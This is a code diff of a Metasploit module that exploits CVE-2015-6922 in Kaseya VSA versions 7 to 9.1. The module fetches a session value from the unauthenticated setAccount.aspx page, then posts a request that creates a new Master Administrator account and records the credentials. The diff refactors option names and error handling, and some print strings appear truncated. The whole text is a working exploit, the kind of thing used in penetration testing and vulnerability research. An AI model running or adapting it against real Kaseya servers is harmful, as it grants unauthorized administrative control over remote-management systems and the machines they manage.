@@ -14,90 +14,94 @@ def initialize(info = {})
1414 super ( update_info ( info ,
1515 'Name' => 'Kaseya VSA Master Administrator Account Creation' ,
1616 'Description' => %q{
17- This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new
18- Master Administrator account. Normally this page is only accessible via the localhost
19- interface, but the application does nothing to prevent this apart from attempting to
20- force a redirect. This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and
21- v9.0.0.3.
22- } ,
17+ This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new
18+ Master Administrator account. Normally this page is only accessible via the localhost
19+ interface, but the application does nothing to prevent this apart from attempting to
20+ force a redirect. This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and
21+ v9.0.0.3.
22+ },
2323 'Author' =>
2424 [
2525 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
2626 ] ,
2727 'License' => MSF_LICENSE ,
2828 'References' =>
2929 [
30- [ 'CVE' , '2015-6922' ] ,
31- [ 'ZDI' , '15-448' ] ,
32- [ 'URL' , 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt' ] ,
33- [ 'URL' , 'TODO_FULLDISC_URL' ]
30+ [ 'CVE' , '2015-6922' ] ,
31+ [ 'ZDI' , '15-448' ] ,
32+ [ 'URL' , 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt' ] ,
33+ [ 'URL' , 'TODO_FULLDISC_URL' ]
3434 ] ,
3535 'DisclosureDate' => 'Sep 23 2015' ) )
3636
3737 register_options (
3838 [
39- OptString . new ( 'TARGETURI' , [ true , " The Kaseya VSA URI" , '/' ] ) ,
40- OptString . new ( 'USERNAME ' , [ true , 'The username for the new admin account' , 'msf' ] ) ,
41- OptString . new ( 'PASSWORD ' , [ true , 'The password for the new admin account' , 'password' ] ) ,
39+ OptString . new ( 'TARGETURI' , [ true , ' The Kaseya VSA URI' , '/' ] ) ,
40+ OptString . new ( 'KASEYA_USER ' , [ true , 'The username for the new admin account' , 'msf' ] ) ,
41+ OptString . new ( 'KASEYA_PASS ' , [ true , 'The password for the new admin account' , 'password' ] ) ,
4242 OptString . new ( 'EMAIL' , [ true , 'The email for the new admin account' , '[email protected] ' ] ) 4343 ] , self . class )
4444 end
4545
4646
4747 def run
4848 res = send_request_cgi ( {
49- 'uri' => normalize_uri ( target_uri . path , "/ LocalAuth/ setAccount.aspx" ) ,
49+ 'uri' => normalize_uri ( target_uri . path , ' LocalAuth' , ' setAccount.aspx' ) ,
5050 'method' => 'GET' ,
5151 } )
5252
53- if res and res . body =~ /ID="sessionVal" name="sessionVal" value='([0-9]*)'/
54- sessionVal = $1
55- print_status ( "#{ peer } + sessionVal + ", creating Master Administrator account" )
53+ if res && res . body && res . body . to_s =~ /ID="sessionVal" name="sessionVal" value='([0-9]*)'/
54+ session_val = $1
55+ else
56+ print_error ( "#{ peer } )
57+ return
58+ end
5659
57- res = send_request_cgi ( {
58- 'uri' => normalize_uri ( target_uri . path , "/LocalAuth/setAccount.aspx" ) ,
59- 'method' => 'POST' ,
60- 'vars_post' => {
61- "sessionVal" => sessionVal ,
62- "adminName" => datastore [ 'USERNAME' ] ,
63- "NewPassword" => datastore [ 'PASSWORD' ] ,
64- "confirm" => datastore [ 'PASSWORD' ] ,
65- "adminEmail" => datastore [ 'EMAIL' ] ,
66- "setAccount" => "Create"
67- }
68- } )
60+ print_status ( "#{ peer } #{ session_val } )
6961
70- if res and res . code == 302 and res . body =~ /\/ vsapres\/ web20\/ core\/ login\. asp/
71- print_good ( "#{ peer } #{ datastore [ 'USERNAME' ] } #{ datastore [ 'PASSWORD' ] } )
72- service_data = {
73- address : rhost ,
74- port : rport ,
75- service_name : ( ssl ? 'https' : 'http' ) ,
76- protocol : 'tcp' ,
77- workspace_id : myworkspace_id
78- }
79- credential_data = {
80- origin_type : :service ,
81- module_fullname : self . fullname ,
82- private_type : :password ,
83- private_data : datastore [ 'PASSWORD' ] ,
84- username : datastore [ 'USERNAME' ]
85- }
62+ res = send_request_cgi ( {
63+ 'uri' => normalize_uri ( target_uri . path , 'LocalAuth' , 'setAccount.aspx' ) ,
64+ 'method' => 'POST' ,
65+ 'vars_post' => {
66+ 'sessionVal' => session_val ,
67+ 'adminName' => datastore [ 'KASEYA_USER' ] ,
68+ 'NewPassword' => datastore [ 'KASEYA_PASS' ] ,
69+ 'confirm' => datastore [ 'KASEYA_PASS' ] ,
70+ 'adminEmail' => datastore [ 'EMAIL' ] ,
71+ 'setAccount' => 'Create'
72+ }
73+ } )
8674
87- credential_data . merge! ( service_data )
88- credential_core = create_credential ( credential_data )
89- login_data = {
90- core : credential_core ,
91- access_level : 'Master Administrator' ,
92- status : Metasploit ::Model ::Login ::Status ::UNTRIED
93- }
94- login_data . merge! ( service_data )
95- create_credential_login ( login_data )
96- else
97- print_error ( "#{ peer } )
98- end
99- else
100- print_error ( "#{ peer } )
75+ unless res && res . code == 302 && res . body && res . body . to_s . include? ( '/vsapres/web20/core/login.asp' )
76+ print_error ( "#{ peer } )
77+ return
10178 end
79+
80+ print_good ( "#{ peer } #{ datastore [ 'KASEYA_USER' ] } #{ datastore [ 'KASEYA_PASS' ] } )
81+ service_data = {
82+ address : rhost ,
83+ port : rport ,
84+ service_name : ( ssl ? 'https' : 'http' ) ,
85+ protocol : 'tcp' ,
86+ workspace_id : myworkspace_id
87+ }
88+
89+ credential_data = {
90+ origin_type : :service ,
91+ module_fullname : self . fullname ,
92+ private_type : :password ,
93+ private_data : datastore [ 'KASEYA_PASS' ] ,
94+ username : datastore [ 'KASEYA_USER' ]
95+ }
96+
97+ credential_data . merge! ( service_data )
98+ credential_core = create_credential ( credential_data )
99+ login_data = {
100+ core : credential_core ,
101+ access_level : 'Master Administrator' ,
102+ status : Metasploit ::Model ::Login ::Status ::UNTRIED
103+ }
104+ login_data . merge! ( service_data )
105+ create_credential_login ( login_data )
102106 end
103107end
0 commit comments